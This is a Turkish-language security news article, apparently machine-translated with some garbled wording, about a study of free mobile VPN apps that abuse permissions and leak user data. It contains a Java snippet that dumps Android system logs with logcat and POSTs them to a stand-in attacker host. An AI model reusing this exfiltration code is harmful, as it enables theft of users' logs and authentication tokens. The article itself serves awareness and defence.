Mobil VPN uygulamaları, akıllı telefonlarda gizliliği ve güvenli iletişimi korumayı vaat ediyor, ancak yaklaşık 800 ücretsiz Android ve iOS VPN uygulamalarının kapsamlı bir analizi rahatsız edici bir gerçekliği ortaya koyuyor: Bu araçların çoğu, hassas bilgileri korumak yerine ortaya koyuyor.
Güvensiz yapılandırmalardan tehlikeli izinlere ve eski kütüphanelere kadar, milyonlarca güvenin uygulamaları genellikle hem kişisel hem de kurumsal güvenliğin en zayıf bağlantısıdır.
Yaygın veri sızıntısının etkileri, bireysel gizliliğin çok ötesine uzanır-kurumsal ağlar, BYOD politikaları ve yüksek değerli hedefler beklenmedik maruziyetlerden muzdariptir.
Geçen yıl ortaya çıkan bu eğilim, kullanıcıların maliyetsiz şifreleme ve sınırsız tarama arzusunu kullanıyor.
Aksi takdirde meşru VPN arayüzlerinde saklanan saldırganlar kimlik bilgilerini kesebilir, cihaz tanımlayıcılarını hasat edebilir ve hatta ortam sesini kaydedebilir.
Zimperium analistleri, şifrelenmemiş kullanıcı meta verilerini uzak sunuculara aktaran düzinelerce uygulamanın keşfedildiğini ve güvenli tünel şifrelemesinin herhangi bir görünümünü atladığını kaydetti.
Bu bulgular, tehdit aktörlerinin ücretsiz VPN hizmetlerine verilen güveni ne kadar kolay kullanabileceğini vurgulamaktadır.
İlk enfeksiyon vektörleri platforma göre değişir. Android’de, birkaç VPN paketi, uygulama lansmanından sonra gizli ağ isteklerini tetikleyen kötü amaçlı modüllerle yeniden paketlenir.
İOS’ta, yanlış yapılandırılmış gizlilik tezahürleri ve aşırı ödenek yetkileri, uygulamaların konumu, kullanım günlüklerini ve çarpışma raporlarını sessizce toplamasına ve sunmasına izin verir. Her iki ekosistemde de, eksik sertifika doğrulaması ve maruz kalan API’lerin bir kombinasyonu, ortadaki insan ve veri hasat saldırıları için verimli bir zemin oluşturur.
Birçok kurban, olağandışı ağ trafik modelleri veya açıklanamayan hesap kilitlemeleri ortaya çıkana kadar farkında değil. Kurumsal savunucular genellikle ücretsiz VPN’leri zararsız üretkenlik araçları olarak reddeder ve yanlışlıkla kurumsal güvenlik duvarlarında carte blanche verir.
Günlükler, şüpheli alan adlarına giden – kişisel tanımlayıcılarla tamamlanan – giden talepleri ortaya çıkardığında, ihlal zaten devam ediyor.
İzin kötüye kullanımı ve veri açığa çıkması
Bu sızıntıları sağlayan kritik bir mekanizma, bir VPN’nin meşru kapsamını aşan tehlikeli izinlerin kötüye kullanılmasıdır.
Örneğin, Android’de Read_Logs izni, bir uygulamanın kullanıcı girişi ve kimlik doğrulama jetonları parçaları dahil tüm sistem günlüklerini okumasını ve bunları bir saldırganın sunucusuna iletmesini sağlar.
Aşağıdaki örnek bir Java snippet’i, bir kötü amaçlı modülün günlükleri ne kadar kolay yakaladığını ve bunları http:-
Process process = Runtime.getRuntime().exec("logcat -d");
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
StringBuilder log = new StringBuilder();
String line;
while ((line = bufferedReader.readLine()) != null) {
log.append(line).append("\n");
}
HttpURLConnection conn = (HttpURLConnection) new URL("https://malicious.example.com/collect").openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
conn.getOutputStream().write(log.toString().getBytes(StandardCharsets.UTF_8));
conn.getInputStream();Bu gizli kanal, standart VPN şifrelemesini atlar ve kullanıcı farkındalığını ortadan kaldırır. İOS’ta, Location_always gibi özel yetkiler, uygulamaların verilerle gerçek zamanlı hareketi kaynaştırmasına izin veren sabit GPS erişimi verir.
.webp)
Bu, analiz edilen VPN uygulamaları arasında aşırı izinlerin yaygınlığını göstermektedir. Bu ücretsiz VPN uygulamaları, izinli izinden yararlanarak güvenilir gizlilik araçlarını gözetim platformlarına dönüştürür.
Kullanıcılar ve kuruluşlar, şeffaf güvenlik uygulamaları ve düzenli kod bakımı ile çözümleri tercih ederek izinleri ve veteriner VPN sağlayıcılarını titizlikle incelemelidir.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
